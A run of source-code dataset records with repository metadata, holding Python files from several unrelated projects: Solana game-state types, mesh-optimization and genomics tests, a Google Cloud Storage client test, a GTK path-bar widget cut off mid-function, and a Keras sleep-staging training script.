] | 87 | 2021-09-26T18:14:07.000Z | 2022-03-28T08:22:24.000Z | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
] | 15 | 2021-10-07T16:12:23.000Z | 2022-03-20T21:04:40.000Z | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
] | 16 | 2021-10-16T04:40:28.000Z | 2022-03-18T16:49:40.000Z | from __future__ import annotations
import typing
from dataclasses import dataclass
from solana.publickey import PublicKey
from anchorpy.borsh_extension import EnumForCodegen, BorshPubkey
import borsh_construct as borsh
class WonJSONValue(typing.TypedDict):
winner: str
class WonValue(typing.TypedDict):
winner: PublicKey
class ActiveJSON(typing.TypedDict):
kind: typing.Literal["Active"]
class TieJSON(typing.TypedDict):
kind: typing.Literal["Tie"]
class WonJSON(typing.TypedDict):
value: WonJSONValue
kind: typing.Literal["Won"]
@dataclass
class Active:
discriminator: typing.ClassVar = 0
kind: typing.ClassVar = "Active"
@classmethod
def to_json(cls) -> ActiveJSON:
return ActiveJSON(
kind="Active",
)
@classmethod
def to_encodable(cls) -> dict:
return {
"Active": {},
}
@dataclass
class Tie:
discriminator: typing.ClassVar = 1
kind: typing.ClassVar = "Tie"
@classmethod
def to_json(cls) -> TieJSON:
return TieJSON(
kind="Tie",
)
@classmethod
def to_encodable(cls) -> dict:
return {
"Tie": {},
}
@dataclass
class Won:
discriminator: typing.ClassVar = 2
kind: typing.ClassVar = "Won"
value: WonValue
def to_json(self) -> WonJSON:
return WonJSON(
kind="Won",
value={
"winner": str(self.value["winner"]),
},
)
def to_encodable(self) -> dict:
return {
"Won": {
"winner": self.value["winner"],
},
}
GameStateKind = typing.Union[Active, Tie, Won]
GameStateJSON = typing.Union[ActiveJSON, TieJSON, WonJSON]
def from_decoded(obj: dict) -> GameStateKind:
if not isinstance(obj, dict):
raise ValueError("Invalid enum object")
if "Active" in obj:
return Active()
if "Tie" in obj:
return Tie()
if "Won" in obj:
val = obj["Won"]
return Won(
WonValue(
winner=val["winner"],
)
)
raise ValueError("Invalid enum object")
def from_json(obj: GameStateJSON) -> GameStateKind:
if obj["kind"] == "Active":
return Active()
if obj["kind"] == "Tie":
return Tie()
if obj["kind"] == "Won":
won_json_value = typing.cast(WonJSONValue, obj["value"])
return Won(
WonValue(
winner=PublicKey(won_json_value["winner"]),
)
)
kind = obj["kind"]
raise ValueError(f"Unrecognized enum kind: {kind}")
layout = EnumForCodegen(
"Active" / borsh.CStruct(),
"Tie" / borsh.CStruct(),
"Won" / borsh.CStruct("winner" / BorshPubkey),
)
| 21.292308 | 64 | 0.58237 | 1,370 | 0.494942 | 0 | 0 | 1,073 | 0.387645 | 0 | 0 | 293 | 0.105853 |
6342acf3483b4a05386806c72b9900a8869e9d07 | 1,196 | py | Python | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | 1 | 2019-04-12T01:23:17.000Z | 2019-04-12T01:23:17.000Z | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | null | null | null | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
import pytest
import optimesh
from helpers import download_mesh
@pytest.mark.parametrize(
"options",
[
["--method", "cpt-dp"],
["--method", "cpt-uniform-fp"],
["--method", "cpt-uniform-qn"],
#
["--method", "cvt-uniform-lloyd"],
["--method", "cvt-uniform-lloyd", "--omega", "2.0"],
["--method", "cvt-uniform-qnb"],
["--method", "cvt-uniform-qnf", "--omega", "0.9"],
#
["--method", "odt-dp-fp"],
["--method", "odt-uniform-fp"],
["--method", "odt-uniform-bfgs"],
],
)
def test_cli(options):
input_file = download_mesh(
# "circle.vtk", "614fcabc0388e1b43723ac64f8555ef52ee4ddda1466368c450741eb"
"pacman.vtk",
"19a0c0466a4714b057b88e339ab5bd57020a04cdf1d564c86dc4add6",
)
output_file = "out.vtk"
optimesh.cli.main([input_file, output_file, "-t", "1.0e-5", "-n", "5"] + options)
return
def test_info():
input_file = download_mesh(
"pacman.vtk", "19a0c0466a4714b057b88e339ab5bd57020a04cdf1d564c86dc4add6"
)
optimesh.cli.info([input_file])
return
if __name__ == "__main__":
test_cli("odt")
| 24.916667 | 85 | 0.576923 | 0 | 0 | 0 | 0 | 867 | 0.724916 | 0 | 0 | 577 | 0.482441 |
6343d7c7cb482c3822a30210560f4a05a0ff2ffb | 1,087 | py | Python | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class WindowInteropHelper(object):
"""
Assists interoperation between Windows Presentation Foundation (WPF) and Win32 code.
WindowInteropHelper(window: Window)
"""
def EnsureHandle(self):
"""
EnsureHandle(self: WindowInteropHelper) -> IntPtr
Creates the HWND of the window if the HWND has not been created yet.
Returns: An System.IntPtr that represents the HWND.
"""
pass
@staticmethod
def __new__(self,window):
""" __new__(cls: type,window: Window) """
pass
Handle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the window handle for a Windows Presentation Foundation (WPF) window�that is used to create this System.Windows.Interop.WindowInteropHelper.
Get: Handle(self: WindowInteropHelper) -> IntPtr
"""
Owner=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the handle of the Windows Presentation Foundation (WPF)�owner window.
Get: Owner(self: WindowInteropHelper) -> IntPtr
Set: Owner(self: WindowInteropHelper)=value
"""
| 30.194444 | 151 | 0.710212 | 1,083 | 0.992667 | 0 | 0 | 94 | 0.086159 | 0 | 0 | 787 | 0.721357 |
6344c1a546dfde9307cede5f7a6e9805a1f7479b | 385 | py | Python | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | # pylint: skip-file
# flake8: noqa
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
import ruamel.yaml as yaml
from ansible.module_utils.basic import AnsibleModule
| 20.263158 | 64 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.433766 |
6344f2d6da2847a70b255b03f0e6dc740b751d0e | 1,025 | py | Python | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 57 | 2015-03-09T01:26:45.000Z | 2022-02-22T07:26:01.000Z | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 33 | 2015-02-03T23:24:46.000Z | 2022-03-16T20:08:10.000Z | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 33 | 2015-01-18T16:47:47.000Z | 2022-02-22T07:28:09.000Z | #!/usr/bin/env python
'''
Tests for bamutils stats
'''
import os
import unittest
import ngsutils.bam
import ngsutils.bam.stats
class StatsTest(unittest.TestCase):
def setUp(self):
self.bam = ngsutils.bam.bam_open(os.path.join(os.path.dirname(__file__), 'test.bam'))
def tearDown(self):
self.bam.close()
def testStats(self):
stats = ngsutils.bam.stats.BamStats(self.bam)
self.assertEqual(7, stats.total)
self.assertEqual(6, stats.mapped)
self.assertEqual(1, stats.unmapped)
self.assertEqual(1, stats.flag_counts.counts[0x10]) # one reverse
self.assertEqual(1, stats.flag_counts.counts[0x4]) # one unmapped
self.assertEqual(0, stats.flag_counts.counts[0x2]) # zero all aligned (not paired)
self.assertTrue('chr1' in stats.refs) # 6 on chr1
self.assertTrue('chr3' not in stats.refs)
def testStatsGTF(self):
# Add a test with a mock GTF file
pass
if __name__ == '__main__':
unittest.main()
| 27.702703 | 93 | 0.660488 | 845 | 0.82439 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.182439 |
6345129d5bc1da3f7a4ddae9ce0115d6922c7000 | 2,042 | py | Python | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | 1 | 2022-02-24T21:25:02.000Z | 2022-02-24T21:25:02.000Z | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | null | null | null | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | null | null | null | from unittest import TestCase
from bavard_ml_utils.gcp.gcs import GCSClient
from test.utils import DirSpec, FileSpec
class TestGCSClient(TestCase):
test_data_spec = DirSpec(
path="gcs-test",
children=[
FileSpec(path="test-file.txt", content="This is a test."),
FileSpec(path="test-file-2.txt", content="This is also a test."),
DirSpec(path="subdir", children=[FileSpec(path="test-file-3.txt", content="This one too.")]),
],
)
test_bucket_name = "gcs-client-bucket"
@classmethod
def setUpClass(cls):
cls.test_data_spec.write()
cls.client = GCSClient()
cls.client.create_bucket(cls.test_bucket_name)
@classmethod
def tearDownClass(cls):
cls.test_data_spec.remove()
def tes_can_upload_and_download_blob(self):
test_file = self.test_data_spec.children[0]
# Can upload blob.
gcs_uri = f"gs://{self.test_bucket_name}/{test_file.path}"
blob = self.client.upload_filename_to_blob(test_file.path, gcs_uri)
# Can download blob; contents are correct.
self.assertEqual(test_file.content, blob.download_as_text())
# Can delete blob.
blob.delete()
def test_can_upload_and_download_directory(self):
gcs_upload_dir = f"gs://{self.test_bucket_name}/temp-data"
# Upload directory (including a subdirectory).
self.client.upload_dir(self.test_data_spec.path, gcs_upload_dir)
# Download directory.
self.client.download_dir(gcs_upload_dir, "gcs-test-copy")
# Folder that was uploaded and downloaded should recursively have
# the same contents as the original one.
downloaded_spec = DirSpec.from_path("gcs-test-copy")
for child, dchild in zip(
sorted(self.test_data_spec.children, key=lambda c: c.path),
sorted(downloaded_spec.children, key=lambda c: c.path),
):
self.assertEqual(child, dchild)
# Clean up.
downloaded_spec.remove()
| 36.464286 | 105 | 0.658668 | 1,921 | 0.940744 | 0 | 0 | 236 | 0.115573 | 0 | 0 | 520 | 0.254652 |
63456d2b7e536035a7766de0ff9f77efbb0f499a | 357 | py | Python | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | # Peter Kowalsky - 10.06.19
import os
def check_if_file_exists(path):
exists = os.path.isfile(path)
if exists:
return 1
else:
return 0
def list_all_files_in_dir(path, type):
files = []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
if type in file:
files.append(file)
return files
| 17.85 | 38 | 0.638655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 61 | 0.170868 |
63468acc0ac6a4997496eeb95bb3c0c24a04aa45 | 2,746 | py | Python | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | from fim_mission import *
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision.transforms as transforms
from torchvision import datasets, models
import matplotlib.pyplot as plt
from tensorboardX import SummaryWriter, writer
import os
import argparse
import random
import numpy as np
import warnings
from PIL import Image
plt.ion() # interactive mode
warnings.filterwarnings('ignore')
os.environ['CUDA_VISIBLE_DEVICES'] = '1' # opt.cuda
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # "cpu" #
datawriter = SummaryWriter()
data_root = './Dataset' # '../Dataset/Kaggle265'
target_root = './Targetset' # '../Dataset/Kaggle265'
num_workers = 0
loader = aim_loader(data_root, target_root, num_workers)
model_ft = models.resnet50(pretrained=True).to(device)
print(model_ft)
'''
# criterion = torch.nn.MSELoss()
criterion = torch.nn.L1Loss()
step = 16
model_ft.eval()
with torch.no_grad():
for num_iter, (data, target, data_size, target_size) in enumerate(tqdm(loader)):
target = target.to(device)
data = data.to(device)
data_size = data_size.item()
target_size = target_size.item()
min_loss = 1024.
min_i, min_j = -1, -1
for i in range(0, data_size-target_size, step):
for j in range(0, data_size-target_size, step):
trans_T = model_ft(target)
trans_D = model_ft(data[:,:,i:i+target_size,j:j+target_size])
loss = criterion(trans_T, trans_D).item()
if min_loss>loss:
min_i, min_j = i, j
min_loss = loss
head_i = max(0, min_i-step)
head_j = max(0, min_j-step)
tail_i = min(min_i+step, data_size)
tail_j = min(min_j+step, data_size)
for i in range(head_i, tail_i):
for j in range(head_j, tail_j):
trans_T = model_ft(target)
trans_D = model_ft(data[:,:,i:i+target_size,j:j+target_size])
loss = criterion(trans_T, trans_D).item()
if min_loss>loss:
min_i, min_j = i, j
min_loss = loss
data[0,:,min_i:min_i+target_size,min_j:min_j+target_size] = target[0,:,:,:]
datawriter.add_image('new_img', data[0,:,:,:], num_iter)
datawriter.add_scalar('img_loss', min_loss, num_iter)
x, y = get_position(min_i, min_j, data_size, target_size)
print('Iter : {}'.format(num_iter))
print('Pos = ({}, {})'.format(x, y))
print('Loss = {}'.format(min_loss))
datawriter.close()
''' | 32.305882 | 84 | 0.633285 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,929 | 0.702476 |
6346bc83f256deb2c811a42a3cf69e8067d988ea | 4,337 | py | Python | sleep_staging_methods/multitaper/train_8m.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 27 | 2019-04-26T21:12:52.000Z | 2022-03-13T15:51:18.000Z | sleep_staging_methods/multitaper/train_8m.py | Hongyang449/DeepSleep | f779e050e4ad1ba7b96ddf0c9aef421770bbbd53 | [
"MIT"
] | 3 | 2021-07-20T15:35:07.000Z | 2021-11-12T15:35:52.000Z | sleep_staging_methods/multitaper/train_8m.py | GuanLab/DeepSleep | 220ae1348aaaba115b82d89a9a5ab5bb6f569062 | [
"MIT"
] | 9 | 2019-06-12T20:10:24.000Z | 2021-12-08T12:45:36.000Z | from __future__ import print_function
import os
import sys
import numpy as np
from keras.models import Model
from keras.layers import Input, concatenate, Conv1D, MaxPooling1D, Conv2DTranspose,Lambda
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import tensorflow as tf
import keras
import cv2
import scipy.io
# for Fourier Transform
from scipy import signal
#from spectrum import pmtm
#from keras.backend.tensorflow_backend import set_session
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.9
#set_session(tf.Session(config=config))
K.set_image_data_format('channels_last') # TF dimension ordering in this code
batch_size=5
ss = 10
def scaleImage (image,scale):
[x,y]= image.shape
x1=x
y1=int(round(y*scale))
image=cv2.resize(image.astype('float32'),(y1,x1)) # check this for multiple channnels!!
new=np.zeros((x,y))
if (y1>y):
start=int(round(y1/2-y/2))
end=start+y
new=image[:,start:end]
else:
new_start=int(round(y-y1)/2)
new_end=new_start+y1
new[:,new_start:new_end]=image
return new
def label_major_vote(input_data,scale_pool):
size_new=int(input_data.shape[1]/scale_pool)
input_data=input_data.reshape(size_new,scale_pool).T
input_data=input_data.astype(int) + 1 # bincount need non-negative, int dtype
counts=np.apply_along_axis(lambda x: np.bincount(x, minlength=3), axis=0, arr=input_data)
major=np.apply_along_axis(lambda x: np.argmax(x), axis=0, arr=counts) - 1
major=major.reshape(1,len(major))
return major
import unet
import random
model = unet.get_unet()
#model.load_weights('weights_' + sys.argv[1] + '.h5')
#model.summary()
from datetime import datetime
import random
path1='/ssd/hongyang/2018/physionet/data/multitaper96/'
path2='/ssd/hongyang/2018/physionet/data/multitaper96_label/'
new_path='/ssd/hongyang/2018/physionet/data/new_arousal/'
all_ids=open('whole_train.dat','r')
all_line=[]
for line in all_ids:
all_line.append(line.rstrip())
all_ids.close()
#random.seed(datetime.now())
random.seed(int(sys.argv[1]))
random.shuffle(all_line)
partition_ratio=0.8
train_line=all_line[0:int(len(all_line)*partition_ratio)]
test_line=all_line[int(len(all_line)*partition_ratio):len(all_line)]
random.seed(datetime.now())
def generate_data(train_line, batch_size, if_train):
"""Replaces Keras' native ImageDataGenerator."""
##### augmentation parameters ######
if_time=False
max_scale=1.15
min_scale=1
if_mag=True
max_mag=1.15
min_mag=0.9
if_flip=False
####################################
i = 0
while True:
image_batch = []
label_batch = []
for b in range(batch_size):
if i == len(train_line):
i = 0
random.shuffle(train_line)
sample = train_line[i]
i += 1
the_id=sample.split('/')[-1]
image = np.load(path1 + the_id + '.npy')
label = np.load(path2 + the_id + '.npy')
index=np.arange(0,20960,32)
random.shuffle(index)
for k in index: #
label_final=label_major_vote(label[:,k:(k+32)],2**4)
if np.sum(label_final!=-1) > 0:
image_batch.append(image[:,k:(k+32)].T)
label_batch.append(label_final.T)
image_batch=np.array(image_batch)
label_batch=np.array(label_batch)
# print(image_batch.shape,label_batch.shape)
yield image_batch, label_batch
#model_checkpoint = ModelCheckpoint('weights.h5', monitor='val_loss', save_best_only=False)
name_model='weights_' + sys.argv[1] + '.h5'
callbacks = [
# keras.callbacks.TensorBoard(log_dir='./',
# histogram_freq=0, write_graph=True, write_images=False),
keras.callbacks.ModelCheckpoint(os.path.join('./', name_model),
verbose=0,save_weights_only=False,monitor='val_loss')
#verbose=0,save_weights_only=False,monitor='val_loss',save_best_only=True)
]
model.fit_generator(
generate_data(train_line, batch_size,True),
steps_per_epoch=int(len(train_line) // batch_size), nb_epoch=25,
validation_data=generate_data(test_line,batch_size,False),
validation_steps=int(len(test_line) // batch_size),callbacks=callbacks)
| 32.609023 | 93 | 0.685958 | 0 | 0 | 1,228 | 0.283145 | 0 | 0 | 0 | 0 | 1,122 | 0.258704 |
6346c2addc2cf35274df3428a19c76028b86eba4 | 252 | py | Python | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | 2 | 2022-02-15T19:18:12.000Z | 2022-02-16T08:06:20.000Z | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | null | null | null | Sprachanalyse/versuch.py | DemonicStorm/LitBlogRepo | 0fe436071840f3b9af59f4363967cfc6eb397865 | [
"MIT"
] | null | null | null | import spacy
from spacy_langdetect import LanguageDetector
import en_core_web_sm
from glob import glob
nlp = en_core_web_sm.load()
#nlp = spacy.load('en')
nlp.add_pipe(LanguageDetector(), name='language_detector', last=True)
print(LanguageDetector) | 21 | 69 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.166667 |
63494cbde2d85460ac5f8725fc7d01e2aee00fe5 | 43,623 | py | Python | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | usr/lib/tuquito/tuquito-software-manager/widgets/pathbar2.py | emmilinuxorg/emmi-aplicativos | ae84dcc8b9441dd6c735f70a9b1a8ec91871955d | [
"MIT"
] | null | null | null | # Copyright (C) 2009 Matthew McGowan
#
# Authors:
# Matthew McGowan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rgb
import gtk
import cairo
import pango
import gobject
from rgb import to_float as f
# pi constants
M_PI = 3.1415926535897931
PI_OVER_180 = 0.017453292519943295
class PathBar(gtk.DrawingArea):
# shapes
SHAPE_RECTANGLE = 0
SHAPE_START_ARROW = 1
SHAPE_MID_ARROW = 2
SHAPE_END_CAP = 3
def __init__(self, group=None):
gtk.DrawingArea.__init__(self)
self.__init_drawing()
self.set_redraw_on_allocate(False)
self.__parts = []
self.__active_part = None
self.__focal_part = None
self.__button_down = False
self.__scroller = None
self.__scroll_xO = 0
self.theme = self.__pick_theme()
# setup event handling
self.set_flags(gtk.CAN_FOCUS)
self.set_events(gtk.gdk.POINTER_MOTION_MASK|
gtk.gdk.BUTTON_PRESS_MASK|
gtk.gdk.BUTTON_RELEASE_MASK|
gtk.gdk.KEY_RELEASE_MASK|
gtk.gdk.KEY_PRESS_MASK|
gtk.gdk.LEAVE_NOTIFY_MASK)
self.connect("motion-notify-event", self.__motion_notify_cb)
self.connect("leave-notify-event", self.__leave_notify_cb)
self.connect("button-press-event", self.__button_press_cb)
self.connect("button-release-event", self.__button_release_cb)
# self.connect("key-release-event", self.__key_release_cb)
self.connect("realize", self.__realize_cb)
self.connect("expose-event", self.__expose_cb)
self.connect("style-set", self.__style_change_cb)
self.connect("size-allocate", self.__allocation_change_cb)
self.last_label = None
return
def set_active(self, part):
part.set_state(gtk.STATE_ACTIVE)
prev, redraw = self.__set_active(part)
if redraw:
self.queue_draw_area(*prev.get_allocation_tuple())
self.queue_draw_area(*part.get_allocation_tuple())
self.last_label = None
return
def get_active(self):
return self.__active_part
# def get_left_part(self):
# active = self.get_active()
# if not active:
# return self.__parts[0]
# i = self.__parts.index(active)+1
# if i > len(self.__parts)-1:
# i = 0
# return self.__parts[i]
# def get_right_part(self):
# active = self.get_active()
# if not active:
# return self.__parts[0]
# i = self.__parts.index(active)-1
# if i < 0:
# i = len(self.__parts)-1
# return self.__parts[i]
def append(self, part):
prev, did_shrink = self.__append(part)
if not self.get_property("visible"):
return False
if self.theme.animate and len(self.__parts) > 1:
aw = self.theme.arrow_width
# calc draw_area
x,y,w,h = part.get_allocation_tuple()
w += aw
# begin scroll animation
self.__hscroll_out_init(
part.get_width(),
gtk.gdk.Rectangle(x,y,w,h),
self.theme.scroll_duration_ms,
self.theme.scroll_fps
)
else:
self.queue_draw_area(*part.get_allocation_tuple())
return False
def remove(self, part):
if len(self.__parts)-1 < 1:
#print 'The first part is sacred ;)'
return
old_w = self.__draw_width()
# remove part from interal part list
try:
del self.__parts[self.__parts.index(part)]
except:
pass
self.__compose_parts(self.__parts[-1], False)
if old_w >= self.allocation.width:
self.__grow_check(old_w, self.allocation)
self.queue_draw()
else:
self.queue_draw_area(*part.get_allocation_tuple())
self.queue_draw_area(*self.__parts[-1].get_allocation_tuple())
return
def __set_active(self, part):
bigger = False
for i in self.id_to_part:
apart = self.id_to_part[i]
if bigger:
self.remove(apart)
if apart == part:
bigger = True
prev_active = self.__active_part
redraw = False
if part.callback:
part.callback(self, part.obj)
if prev_active and prev_active != part:
prev_active.set_state(gtk.STATE_NORMAL)
redraw = True
self.__active_part = part
return prev_active, redraw
def __append(self, part):
# clean up any exisitng scroll callbacks
if self.__scroller:
gobject.source_remove(self.__scroller)
self.__scroll_xO = 0
# the basics
x = self.__draw_width()
self.__parts.append(part)
part.set_pathbar(self)
prev_active = self.set_active(part)
# determin part shapes, and calc modified parts widths
prev = self.__compose_parts(part, True)
# set the position of new part
part.set_x(x)
# check parts fit to widgets allocated width
if x + part.get_width() > self.allocation.width and \
self.allocation.width != 1:
self.__shrink_check(self.allocation)
return prev, True
return prev, False
# def __shorten(self, n):
# n = int(n)
# old_w = self.__draw_width()
# end_active = self.get_active() == self.__parts[-1]
# if len(self.__parts)-n < 1:
# print WARNING + 'The first part is sacred ;)' + ENDC
# return old_w, False
# del self.__parts[-n:]
# self.__compose_parts(self.__parts[-1], False)
# if end_active:
# self.set_active(self.__parts[-1])
# if old_w >= self.allocation.width:
# self.__grow_check(old_w, self.allocation)
# return old_w, True
# return old_w, False
def __shrink_check(self, allocation):
path_w = self.__draw_width()
shrinkage = path_w - allocation.width
mpw = self.theme.min_part_width
xO = 0
for part in self.__parts[:-1]:
w = part.get_width()
dw = 0
if w - shrinkage <= mpw:
dw = w - mpw
shrinkage -= dw
part.set_size(mpw, -1)
part.set_x(part.get_x() - xO)
else:
part.set_size(w - shrinkage, -1)
part.set_x(part.get_x() - xO)
dw = shrinkage
shrinkage = 0
xO += dw
last = self.__parts[-1]
last.set_x(last.get_x() - xO)
return
def __grow_check(self, old_width, allocation):
parts = self.__parts
if len(parts) == 0:
return
growth = old_width - self.__draw_width()
parts.reverse()
for part in parts:
bw = part.get_size_requisition()[0]
w = part.get_width()
if w < bw:
dw = bw - w
if dw <= growth:
growth -= dw
part.set_size(bw, -1)
part.set_x(part.get_x() + growth)
else:
part.set_size(w + growth, -1)
growth = 0
else:
part.set_x(part.get_x() + growth)
parts.reverse()
shift = parts[0].get_x()
# left align parts
if shift > 0:
for part in parts: part.set_x(part.get_x() - shift)
return
def __compose_parts(self, last, prev_set_size):
parts = self.__parts
if len(parts) == 1:
last.set_shape(self.SHAPE_RECTANGLE)
last.set_size(*last.calc_size_requisition())
prev = None
elif len(parts) == 2:
prev = parts[0]
prev.set_shape(self.SHAPE_START_ARROW)
prev.calc_size_requisition()
last.set_shape(self.SHAPE_END_CAP)
last.set_size(*last.calc_size_requisition())
else:
prev = parts[-2]
prev.set_shape(self.SHAPE_MID_ARROW)
prev.calc_size_requisition()
last.set_shape(self.SHAPE_END_CAP)
last.set_size(*last.calc_size_requisition())
if prev and prev_set_size:
prev.set_size(*prev.get_size_requisition())
return prev
def __draw_width(self):
l = len(self.__parts)
if l == 0:
return 0
a = self.__parts[-1].allocation
return a[0] + a[2]
def __hscroll_out_init(self, distance, draw_area, duration, fps):
self.__scroller = gobject.timeout_add(
int(1000.0 / fps), # interval
self.__hscroll_out_cb,
distance,
duration*0.001, # 1 over duration (converted to seconds)
gobject.get_current_time(),
draw_area.x,
draw_area.y,
draw_area.width,
draw_area.height)
return
def __hscroll_out_cb(self, distance, duration, start_t, x, y, w, h):
cur_t = gobject.get_current_time()
xO = distance - distance*((cur_t - start_t) / duration)
if xO > 0:
self.__scroll_xO = xO
self.queue_draw_area(x, y, w, h)
else: # final frame
self.__scroll_xO = 0
# redraw the entire widget
# incase some timeouts are skipped due to high system load
self.queue_draw()
self.__scroller = None
return False
return True
def __part_at_xy(self, x, y):
for part in self.__parts:
a = part.get_allocation()
region = gtk.gdk.region_rectangle(a)
if region.point_in(int(x), int(y)):
return part
return None
def __draw_hscroll(self, cr):
if len(self.__parts) < 2:
return
# draw the last two parts
prev, last = self.__parts[-2:]
# style theme stuff
style, r, aw, shapes = self.style, self.theme.curvature, \
self.theme.arrow_width, self.__shapes
# draw part that need scrolling
self.__draw_part(cr,
last,
style,
r,
aw,
shapes,
self.__scroll_xO)
# draw the last part that does not scroll
self.__draw_part(cr,
prev,
style,
r,
aw,
shapes)
return
def __draw_all(self, cr, event_area):
style = self.style
r = self.theme.curvature
aw = self.theme.arrow_width
shapes = self.__shapes
region = gtk.gdk.region_rectangle(event_area)
# if a scroll is pending we want to not draw the final part,
# as we don't want to prematurely reveal the part befor the
# scroll animation has had a chance to start
if self.__scroller:
parts = self.__parts[:-1]
else:
parts = self.__parts
parts.reverse()
for part in parts:
if region.rect_in(part.get_allocation()) != gtk.gdk.OVERLAP_RECTANGLE_OUT:
self.__draw_part(cr, part, style, r, aw, shapes)
parts.reverse()
return
def __draw_part_ltr(self, cr, part, style, r, aw, shapes, sxO=0):
x, y, w, h = part.get_allocation()
shape = part.shape
state = part.state
icon_pb = part.icon.pixbuf
cr.save()
cr.translate(x-sxO, y)
# draw bg
self.__draw_part_bg(cr, part, w, h, state, shape, style,r, aw, shapes)
# determine left margin. left margin depends on part shape
# and whether there exists an icon or not
if shape == self.SHAPE_MID_ARROW or shape == self.SHAPE_END_CAP:
margin = int(0.75*self.theme.arrow_width + self.theme.xpadding)
else:
margin = self.theme.xpadding
# draw icon
if icon_pb:
cr.set_source_pixbuf(
icon_pb,
self.theme.xpadding-sxO,
(alloc.height - icon_pb.get_height())/2)
cr.paint()
